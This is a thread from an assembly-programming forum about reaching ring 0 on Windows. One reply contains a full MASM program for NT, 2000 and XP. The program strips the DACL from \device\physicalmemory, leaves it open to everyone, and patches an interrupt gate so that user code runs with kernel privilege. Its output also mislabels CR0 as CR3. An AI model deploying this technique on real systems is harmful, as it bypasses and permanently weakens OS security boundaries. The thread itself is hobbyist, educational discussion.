what can I do in ring0 state?

[asmZhou]

    Hi every, I've just read some trickeies for entering the ring0 state.I followed and enter into ring0 state successfully. But then I'm confused, I can't use any bios interrupts any more  in that state, and can't access any specific memory(such as video memory, and keyboard memory etc.) directly.So What can I do in ring0 state? and if there is any way to access the low level resources,what's the way.
    Can anyone give me any advises? thank you very much.

[asmZhou]

By the way ,The system I'm working is Windows 2003 Server

[hutch--]

Zhou,

Normally ring0 access is obtained by writing a driver, apart from security breaches, there is little use for accessing ring0 arapt from driver design. Tell us why you want ring0 access.

[asmZhou]

  Yes,I know access ring0 need writing a driver, and I just juse a driver to enter ring0 (a source code from internet).but that example code just run a simple instruction "mov eax,cr0" when entered ring0.I tried some other instructions,like some bios interrupt calls or instructions accessing memory directly,but failed.
    I've studied and used asm programing during "dos" period.but drop it for many years.I've told that in windows system,I cannot do everything what i want like in dos.This kindled my fight.But with the experiences during these days,I know this is indeed not easy.

[xandaz]

   Hey there. This ring0 thingy seems interesting. Just the other day a guy came into this chat room i was in, looking for some answers regardiing this. He wanted to switch to ring0 to debug a driver he was working on. I looked it up on the internet, but, the examples i found are written either in C# or this strange ÃSM format. I couldn't relly understand it. Can someone explain how to switch from normal to kernel mode? I don't understand much of those registers nor global descriptors.
   Ty guys

[dedndave]

that subject isn't expanded much in this forum, as it opens doors for malicious individuals
there have been a few times i wanted ring 0 access, myself
mainly, i would like to be able to perform direct I/O on the counter/timers and serial/parallel ports like i did under win 98
but, haven't had a pressing need for it just yet   :bg  i have looked around a little bit as well - it doesn't seem that difficult
i do, however, get the impression that programmers writing the code are intentionally cryptic about the method and intent - lol

[ecube]

here's the masm32 driver sdk http://www.freewebs.com/four-f/ , show's some neat things you can do if you like playing in kernel mode, aka ring o, aka the ring of power. For win2k+ drivers are .sys and on win me below drivers are .vxd and the only info I know about vxd's are at http://win32assembly.online.fr/tutorials.html

[japheth]

For 32bit Windows versions prior to Server 2003 ( NT, 2k and XP), one can enter ring 0 directly from a Win32 application, without the help of a driver - if you have administrator privilege:

Code Select Expand



;--- ring0 access for NT platforms
;--- won't work with new versions of this OS

.386p
.model flat, stdcall
option casemap:none

;--- ntdll
NtOpenSection    proto :ptr dword, :dword, :dword
;--- kernel32
ExitProcess      proto :dword
GetStdHandle     proto :dword
WriteFile        proto :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
CloseHandle      proto :dword
MapViewOfFile    proto :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
UnmapViewOfFile  proto :DWORD
;--- advapi32
GetSecurityInfo  proto :dword, :dword, :dword, :dword, :dword, :dword, :dword, :dword
SetSecurityInfo  proto :dword, :dword, :dword, :dword, :dword, :dword, :dword
SetEntriesInAclA proto :dword, :dword, :dword, :dword
;--- user32
wvsprintfA       proto :dword, :dword, :dword

NULL                            equ     0
STD_OUTPUT_HANDLE               equ     -11
OBJ_CASE_INSENSITIVE            equ     40h
SECTION_MAP_WRITE               equ     2
SECTION_MAP_READ                equ     4
MEM_PRIVATE                     equ     20000h
MEM_MAPPED                      equ     40000h
DACL_SECURITY_INFORMATION       equ     4
SE_KERNEL_OBJECT                equ     6
GRANT_ACCESS                    equ     1
NO_MULTIPLE_TRUSTEE             equ     0
TRUSTEE_IS_NAME                 equ     1
TRUSTEE_IS_USER                 equ     1
INTNUMBER                       equ     0ffh

UNICODE_STRING struct
Length_       WORD ?
MaximumLength WORD ?
Buffer        DWORD ?;
UNICODE_STRING ends

OBJECT_ATTRIBUTES struct
Length_        DD ?
RootDirectory  DD ?
ObjectName     DD ?  ;ptr UNICODE_STRING
Attributes     DD ?
SecurityDescriptor DD ?
SecurityQualityOfService DD ?
OBJECT_ATTRIBUTES ends

TRUSTEE_A struct
pMultipleTrustee         DWORD ?
MultipleTrusteeOperation DWORD ?
TrusteeForm              DWORD ?
TrusteeType              DWORD ?
ptstrName                DWORD ?
TRUSTEE_A ends

EXPLICIT_ACCESS_A struct
grfAccessPermissions DWORD ?
grfAccessMode        DWORD ?
grfInheritance       DWORD ?
Trustee              TRUSTEE_A <>
EXPLICIT_ACCESS_A ends

;--- CStr() define a string in .CONST

CStr macro text:VARARG
local sym
.const
sym db text,0
.code
exitm <offset sym>
endm

;---- L() defines a wide string
;---- usage: StringName dw L(stringvalue)

L macro parms:VARARG
local wstr,i,c,tstr
wstr textequ <>
i = 0
for parm,<parms>
  c SubStr <parm>,1,1
  ifidn c,<">
tstr SubStr <parm>,2,@SizeStr(parm)-2
% forc chr$,<tstr>
  if i
wstr CatStr wstr,<,>
  endif
  wstr CatStr wstr,<'&chr$'>
  i = i + 1
endm
  else
if i
  wstr CatStr wstr,<,>
endif
wstr CatStr wstr,<parm>
  endif
endm
exitm <wstr>
endm

.data

align 4

object_buffer dw L("\device\physicalmemory")

align 4

object_name         UNICODE_STRING  {   sizeof object_buffer, sizeof object_buffer + 2, offset object_buffer }
object_attributes   OBJECT_ATTRIBUTES { sizeof OBJECT_ATTRIBUTES, 0, offset object_name, OBJ_CASE_INSENSITIVE, 0, 0 }

explicit_access     EXPLICIT_ACCESS_A { SECTION_MAP_WRITE,
GRANT_ACCESS, 0,
{ NULL, NO_MULTIPLE_TRUSTEE, TRUSTEE_IS_NAME, TRUSTEE_IS_USER, offset szCurrent_user } }
szCurrent_user      db "CURRENT_USER", 0

.code

printf  proc c uses ebx pszFormat:ptr BYTE, args:VARARG

local   dwWritten:DWORD
local   secinfo:DWORD
local   dacl:DWORD
local   newacl:DWORD
local   szOut[256]:byte

invoke GetStdHandle, STD_OUTPUT_HANDLE
mov ebx, eax
invoke wvsprintfA, addr szOut, pszFormat, addr args
lea ecx, dwWritten
invoke WriteFile, ebx, addr szOut, eax, ecx, NULL
ret
align 4
printf  endp

ring0rou:
mov eax, cr0
iretd
align 4

main proc

local hSection:ptr
local dacl:dword
local newacl:dword
local secinfo:dword

;--- try to open "\device\physicalmemory" for writing
invoke NtOpenSection, addr hSection, SECTION_MAP_READ or SECTION_MAP_WRITE, offset object_attributes
test eax, eax
jns hook_interrupt

;--- call didn't succeed, must change ACL

invoke NtOpenSection, addr hSection, MEM_MAPPED or MEM_PRIVATE, offset object_attributes
test eax, eax
js error

;--- get Dacl and SecurityDescriptor

invoke GetSecurityInfo, hSection, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, addr dacl, NULL, addr secinfo

;--- modify ACL

invoke SetEntriesInAclA, 1, offset explicit_access, dacl, addr newacl

;--- pDacl = NULL (access for everyone)

invoke SetSecurityInfo, hSection, SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION, NULL, NULL, NULL, NULL

invoke CloseHandle, hSection

;--- retry to open "\device\physicalmemory"
invoke NtOpenSection, addr hSection, SECTION_MAP_READ or SECTION_MAP_WRITE, offset object_attributes
test eax, eax
js error

hook_interrupt:
push eax
sidt fword ptr [esp - 2]
pop esi
btr esi, 1fh
invoke MapViewOfFile, hSection, SECTION_MAP_WRITE, 0, esi, 1
mov edi, eax
and esi, 0fffh
lea esi, dword ptr [eax + esi + INTNUMBER * 8]
fild qword ptr [esi]           ;save gate
mov eax, offset ring0rou
mov word ptr [esi + 0], ax     ;set LOWORD(eip)
mov byte ptr [esi + 2], 8
mov byte ptr [esi + 5], 0eeh
shr eax, 16
mov word ptr [esi + 6], ax     ;set HIWORD(eip)
int INTNUMBER
fistp qword ptr [esi]          ;restore gate

push eax
invoke UnmapViewOfFile, edi
invoke CloseHandle, hSection
pop eax

invoke printf, CStr("CR3=%X",13,10), eax
ret
error:
invoke printf, CStr("NtOpenSection() failed [%X]",13,10), eax
ret
align 4
main endp

start:
call main
invoke ExitProcess, 0

end start


[vanjast]

Be carefull with Ring0, if you do not do things properly, you'll 'bomb' the system - Be ready for many re-installs or restarts - Have a CD-Boot utility disk on hand to correct your 'mess ups'  :bg MS doesn't always give out this info, for their own (OS) protection.
:8)

[Slugsnack]

Be carefull with Ring0, if you do not do things properly, you'll 'bomb' the system - Be ready for many re-installs or restarts - Have a CD-Boot utility disk on hand to correct your 'mess ups'  :bg MS doesn't always give out this info, for their own (OS) protection.
:8)

Orrrrrrr be smart and do it in a VM